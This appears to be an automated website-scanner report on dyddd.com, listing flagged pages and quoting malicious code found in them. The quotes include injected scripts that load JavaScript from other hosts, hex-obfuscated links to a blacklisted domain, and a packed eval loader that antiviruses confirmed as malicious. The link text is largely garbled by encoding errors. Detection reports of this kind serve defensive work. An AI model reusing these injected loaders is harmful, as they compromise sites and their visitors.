Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dyddd.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.dyddd.com/ | 200 OK Content-Length: 9782 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.52cmq.com ...[2324 bytes skipped]... 0" alt="" border="0" /></a></LI> <LI><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?" ta</div> <div class="friend_link"> <li><a href="http://www.guashays.net/guashays-rxzarvca/">ç¾é°ä¸æ强</a></li><li><a href="http://www.ilimilk.com/ilimilk-mcaaqcczr/">ç±ç±å¯å¥æ³·æ³½èæ</a></li><li><a href="http://www.52cmq.com/52cmq-maacrziwi/">æ··å½å¤©çå è´¹</a></li><li><a href="http://www.686hk.com/686hk-mzximvrz/">鬼å¢è¿·å°¸</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwacvizwr/">é½é²çµè§å°æ°é»ç´æ</a></li><li><a href="http://www.bljsx.com/bljsx-mqiqmrav/">æ人ç¾å¥³è±å å </a></li><li><a href="http://www.ccyj123.com/ccyj123-mrvwczvv/">ä¸è½½å±å§ææºç</a></li ...[1786 bytes skipped]... | ||
http://js.adm.cnzz.net/s.php?sid=252114 | 200 OK Content-Length: 3677 Content-Type: application/x-javascript | clean |
http://www.dyddd.com/static/mulu2/tj.js | 200 OK Content-Length: 406 Content-Type: application/javascript | clean |
http://www.dyddd.com/indexbom.js | 200 OK Content-Length: 2981 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.zoudi6.biz function getArrayItems(arr,num){var temp_array=new Array();for(var index in arr){temp_array.push(arr[index])}var return_array=new Array();for(var i=0;i<num;i++){if(temp_array.length>0){var arrIndex=Math.floor(Math.random()*temp_array.length);return_array[i]=temp_array[arrIndex];temp_array.splice(arrIndex,1)}else{break}}return return_array}var array=new Array();array=new Array('http://www.zoudi6.biz\/web\/login.html|ÓûÍû»ùµØ','http://www.zoudi6.biz\/web\/login.html|É«ÀÇÎÑ×ÛºÏ');array=getArrayItems(array,28);document.writeln('<table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc">');document.writeln('<tr>');var split=new Array();for(i=0;i<array.length;i++){if(i%7==0&i>0){document.writeln('</tr>');document.writeln('<tr>')}split=array[i].split('|'); ...[2473 bytes skipped]... Decoded script: <table width="800" height="5" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#cccccc"> <tr> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">ÓûÍû»ùµØ</a></div></td> <td ><div align="center" ><a href="http://www.zoudi6.biz/web/login.html?259se" target="_blank">É«ÀÇÎÑ×ÛºÏ</a></div></td> </table> <SCRIPT> var text=""; day = new Date( ); time = day.getHours( ); ¡¡if (( time>=0) && (time < 6 )) if(parent.win ...[1520 bytes skipped]... | ||
http://www.dyddd.com/gg/top.js | 200 OK Content-Length: 244 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: www.159gps.com document.writeln("<script language=\"javascript\" type=\"text/javascript\" src=\"http://www.159gps.com/gg/zhanqun.js\"></script>");
document.writeln("<script src=\"http://www.vshinantam.com/gg/indexbom.js\" language=\"javascript\"></script>"); | ||
http://www.dyddd.com/dyddd-rizrvrac/ | 200 OK Content-Length: 10855 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.52cmq.com ...[2140 bytes skipped]... scription_imgs"> <UL> <LI><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?è²é¬¼ç¿å¢æ ¹" target="_blank"><img src="/uploads/images/2013/58/4738.jpg" width="240" height="320" alt="è²é¬¼ç¿å¢æ ¹" border=i/">è²æ¢æ¯ç©ºå è´¹ä¸è½½</a></li><li><a href="http://www.ilimilk.com/ilimilk-mczriwzm/">è²å§ä¸æµªå¦åä½</a></li><li><a href="http://www.52cmq.com/52cmq-mazriwxq/">è²æçµå½±å®æ´çä¸è½½</a></li><li><a href="http://www.686hk.com/686hk-mzzriqmz/">è²æå®æ´ç.3gp</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwzrirwc/">è²æå¨çº¿è§çä¼é ·</a></li><li><a href="http://www.bljsx.com/bljsx-mqzrirxi/">è²è¯«å é¤ç段</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrzrimmm/">è²å°±æ¯è²æ人</a>&l ...[1875 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rizrvrac/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154 | 200 OK Content-Length: 3181 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('L q$=["\\I\\p","\\Q","\\1g\\l\\D\\s\\k",\'\\1c\\k\\g\\m\\f\\j\\l\',\'\\H\\k\\f\\n\\l\\h\',\'\\Y\\z\\z\\u\\f\\1x\\f\\F\\1b\\g\\l\',\'\\1l\\f\\s\\1k\\h\',\'\\1b\\1u\\1c Antivirus reports:
| ||
http://js.users.51.la/16360978.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://www.dyddd.com/test404page.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rizimiiv/ | 200 OK Content-Length: 10908 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.52cmq.com ...[2258 bytes skipped]... 3155.jpg" width="240" height="320" alt="æå姨å§" border="0" /></a></LI> <LI><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62class="friend_link"> <li><a href="http://www.guashays.net/guashays-rxzivmwr/">æè²æç±è²æ¬§ç¾å¾åº</a></li><li><a href="http://www.ilimilk.com/ilimilk-mczivvcw/">æä¸äºå¦å§</a></li><li><a href="http://www.52cmq.com/52cmq-mazivvva/">ææ¯ä¸ªèå¤</a></li><li><a href="http://www.686hk.com/686hk-mzziviwx/">ææ¯è°çè°</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwzivxcv/">æå两ä¸å¤«ä¸èµ·çæ´»</a></li><li><a href="http://www.bljsx.com/bljsx-mqzivxvr/">æ为ç¸ç¸å裸模</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrziicqw/">æ乡é´ç妻å</a></li>& ...[1801 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rizimiiv/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rirvzqrr/ | 200 OK Content-Length: 9090 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.52cmq.com ...[2035 bytes skipped]... /www.dyddd.com/'>é¦é¡µ</a> > <a href='/dyddd-rirvzqrr/'>é³å å¯ç±ç¾å¥³å¾ç头å</a> > ç¾å¥³å¿½æ å²</p> </div> <div class="description_imgs"> <UL> <LI><a href="http://%77%77%77%2E%7A%6F%75%64%69%36%2E%62%69%7A/?é³å å¯ç±ç¾å¥³å¾ç头å" targetmilk-mcrvwzva/">欧ç¾å¥³å¾å§ 大å¾</a></li><li><a href="http://www.52cmq.com/52cmq-marvwwwx/">2013ç¾å¤§ç¾å¥³</a></li><li><a href="http://www.686hk.com/686hk-mzrvwqcv/">大尺度ç¾å¥³å¾çæç´¢</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwrvwqvr/">åå·å°é ç¾å¥³å¤</a></li><li><a href="http://www.bljsx.com/bljsx-mqrvwrqw/">欧ç¾å¥³ç头åæå¢</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrrvwmaa/">ä¸ç¾çç¾å¥³çµå½±ed2k< ...[1950 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rirvzqrr/indexbom.js | 404 Not Found Content-Length: 45857 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.zoudi6.biz ...[380 bytes skipped]... pe> <META name=keywords content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <META name=description content=ÐÔ°É|´ºÅ¯»¨¿ª,ÐÔ°ÉÓÐÄã|Sex8|ÐÔ°É×îеØÖ·£¡> <script id="wf" type="text/javascript" charset="gb2312" src="http://app.adanzhuo.com/appiso.js?l=cparifu&uid=1154"></script> <META content=IE=EmulateIE7 http-equiv=X-UA-Compatible><LINK rel=stylesheet href="http://www.zoudi6.biz/aimg/layout.css"><LINK rel="shortcut icon" href="favicon.ico"> <DIV style="DISPLAY: none"><div style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/16360978.js"></script> <noscript><a href="http://www.51.la/?16360978" target="_blank"><img alt="我要啦免费统计" src="http://img.users.51.la/16360978.asp" ...[3997 bytes skipped]... | ||
http://www.dyddd.com/dyddd-rixmqiw/ | 200 OK Content-Length: 10927 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.52cmq.com ...[2396 bytes skipped]... "http://%77%77%77%2E%7A%6ææ¿å°æ±å±±ï¼é£ä¹ä¸åå°±æ¯ä½ çãâ </p> <div class="clear"></div> </div> </div> <div class="friend_link"> <li><a href="http://www.guashays.net/guashays-rxxvzwa/">açè§é¢</a></li><li><a href="http://www.ilimilk.com/ilimilk-mcxvzxx/">baidu2</a></li><li><a href="http://www.52cmq.com/52cmq-maxvwmv/">bbs55125.cn</a></li><li><a href="http://www.686hk.com/686hk-mzxvqwr/">bbs.renmm.usbbs</a></li><li><a href="http://www.aifantizi.com/aifantizi-mwxvrcw/">beijingxxè§é¢</a></li><li><a href="http://www.bljsx.com/bljsx-mqxvrva/">blog.gmcc.net</a></li><li><a href="http://www.ccyj123.com/ccyj123-mrxvmwx/">bnb898.com</a></li><li><a href="http://www.jiank ...[1712 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dyddd.com
Result:
GET / HTTP/1.1
Host: dyddd.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dyddd.com
Referer: http://www.google.com/search?q=dyddd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dyddd.com
Referer: http://www.google.com/search?q=dyddd.com
Result:
The result is similar to the first query. There are no suspicious redirects found.